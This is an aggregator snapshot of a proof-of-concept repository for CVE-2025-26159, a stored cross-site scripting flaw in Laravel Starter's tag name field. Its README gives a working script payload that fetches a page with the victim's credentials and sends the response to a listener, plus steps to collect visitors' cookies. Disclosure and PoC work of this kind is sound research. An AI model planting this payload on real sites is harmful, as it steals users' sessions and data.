CVE-2025-26159 PoC — Laravel Starter 安全漏洞

Source

https://github.com/godBADTRY/CVE-2025-26159

Associated Vulnerability

Title:Laravel Starter 安全漏洞 (CVE-2025-26159)
Description:Laravel Starter是Nasir Khan Saikat个人开发者的一个基于 Laravel 11.x 的简单入门项目。 Laravel Starter 11.11.0版本存在安全漏洞，该漏洞源于标签功能中对名称字段的输入处理不足，可能导致跨站脚本攻击。

Description

This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159.

Readme

# CVE-2025-26159

> This script may only be used in authorized environments where explicit permission has been granted. The author is not responsible for any misuse, damage, or consequences resulting from the use of this script.


This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159.

### Usage

To understand the explotation steps check out this [post](https://godbadtry.github.io/posts/CVE-2025-26159/) on my blog. 

```bash
go run CVE-2025-26159.go
```

In the tag name field of laravel starter add this payload:

```js
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
```

After a user visits the malicious tag's detail page, you will get his cookies.

File Snapshot


 [4.0K]  /data/pocs/d03ca87b16ce46afa9c1f00d95535ea6d3edc584
├── [1.7K]  CVE-2025-26159.go
└── [ 768]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!